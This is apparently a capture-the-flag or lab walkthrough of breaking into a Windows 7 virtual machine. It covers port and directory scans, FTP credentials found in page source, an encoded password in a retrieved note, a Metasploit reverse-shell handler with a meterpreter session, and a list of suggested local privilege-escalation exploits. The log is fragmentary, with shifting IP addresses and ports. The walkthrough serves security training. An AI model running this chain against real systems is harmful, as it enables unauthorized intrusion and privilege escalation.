3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.956 seconds (130.88 hosts/sec). 3 responded ┌──(root㉿kali)-[~] └─# nmap 192.168.56.109 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 05:51 EST Nmap scan report for 192.168.56.109 Host is up (0.00026s latency). Not shown: 987 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5357/tcp open wsdapi 8080/tcp open http-proxy 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown MAC Address: 08:00:27:0B:E7:C5 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 18.30 seconds
┌──(root㉿kali)-[~] └─# feroxbuster -u http://192.168.56.109:8080 ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.56.109:8080 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 403 GET 7l 20w 199c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 7l 23w 196c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 8l 20w 178c http://192.168.56.109:8080/ 301 GET 7l 20w 241c http://192.168.56.109:8080/Admin => http://192.168.56.109:8080/Admin/ 301 GET 7l 20w 241c http://192.168.56.109:8080/admin => http://192.168.56.109:8080/admin/ 301 GET 7l 20w 241c http://192.168.56.109:8080/ADMIN => http://192.168.56.109:8080/ADMIN/ [####################] - 25s 120006/120006 0s found:4 errors:14 [####################] - 17s 30000/30000 1723/s http://192.168.56.109:8080/ [####################] - 24s 30000/30000 1249/s http://192.168.56.109:8080/Admin/ [####################] - 24s 30000/30000 1250/s http://192.168.56.109:8080/admin/ [####################] - 18s 30000/30000 1631/s http://192.168.56.109:8080/ADMIN/
查看源码
登录后看到
ftpuser:KeepGoingBro!!!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
┌──(root㉿kali)-[~] └─# lftp 192.168.56.108 -u ftpuser 密码: lftp ftpuser@192.168.56.108:~> ls [0] ls & `ls' 在 0 [重新连接前延时: 16] lftp ftpuser@192.168.56.108:~> exit [570091] 转到后台完成传输... ┌──(root㉿kali)-[~] └─# ftp 192.168.56.109 Connected to 192.168.56.109. 220 Microsoft FTP Service Name (192.168.56.109:root): ftpuser 331 Password required for ftpuser. Password: 230 User logged in. Remote system type is Windows_NT. ftp>
ls看到robots.txt,get下来查看
得到
1 2 3 4 5
Admin's Secret Notes 1) Disable the firewall and Windows Defender. 2) Enable FTP and SSH. 3) Start the Apache server. 4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 759 bytes Final size of exe file: 7168 bytes
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path
Exploit target:
Id Name -- ---- 0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(multi/handler) > set lport 1234 lport => 1234 msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.102:8443
C:\Users\ftpuser\Videos>exit exit meterpreter > bg [*] Backgrounding session 1... msf6 exploit(multi/handler) > session [-] Unknown command: session. Did you mean sessions? Run the helpcommandfor more details. msf6 exploit(multi/handler) > sessions
Active sessions ===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows Always-PC\ftpuser @ ALWAYS-PC 192.168.56.102:1234 -> 192.168.56.111:49186 (192.168.56.111)
msf6 exploit(multi/handler) > use multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION falseyes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.111 - Collecting local exploits for x64/windows... [*] 192.168.56.111 - 198 exploit checks are being tried... [+] 192.168.56.111 - exploit/windows/local/always_install_elevated: The target is vulnerable. [+] 192.168.56.111 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! [+] 192.168.56.111 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected! [+] 192.168.56.111 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated. [+] 192.168.56.111 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/ms15_078_atmfd_bof: The service is running, but could not be validated. [+] 192.168.56.111 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/tokenmagic: The target appears to be vulnerable. [+] 192.168.56.111 - exploit/windows/local/virtual_box_opengl_escape: The service is running, but could not be validated. [*] Running check method for exploit 47 / 47 [*] 192.168.56.111 - Valid modules for session 1: ============================
# Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/always_install_elevated Yes The target is vulnerable. 2 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable. 3 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable. 4 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable. 5 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! 6 exploit/windows/local/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable. 7 exploit/windows/local/cve_2021_40449 Yes The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected! 8 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated. 9 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable. 10 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable. 11 exploit/windows/local/ms15_078_atmfd_bof Yes The service is running, but could not be validated. 12 exploit/windows/local/ms16_014_wmi_recv_notif Yes The target appears to be vulnerable. 13 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable. 14 exploit/windows/local/virtual_box_opengl_escape Yes The service is running, but could not be validated. 15 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable. 16 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable. 17 exploit/windows/local/bypassuac_dotnet_profiler No The target is not exploitable. 18 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable. 19 exploit/windows/local/bypassuac_sdclt No The target is not exploitable. 20 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable. 21 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found 22 exploit/windows/local/capcom_sys_exec No The target is not exploitable. 23 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable. 24 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable. 25 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable. 26 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable. 27 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version! 28 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable. 29 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable. 30 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot. 31 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable. 32 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2 33 exploit/windows/local/cve_2023_28252_clfs_driver No The target is not exploitable. The target system does not have clfs.sys in system32\drivers\ 34 exploit/windows/local/cve_2024_30088_authz_basep No The target is not exploitable. Version detected: Windows 7 Service Pack 1 35 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found 36 exploit/windows/local/ikeext_service No The check raised an exception. 37 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store 38 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable. 39 exploit/windows/local/ms16_075_reflection No The target is not exploitable. 40 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable. 41 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception. 42 exploit/windows/local/nvidia_nvsvc No The check raised an exception. 43 exploit/windows/local/panda_psevents No The target is not exploitable. 44 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found 45 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012. 46 exploit/windows/local/webexec No The check raised an exception. 47 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
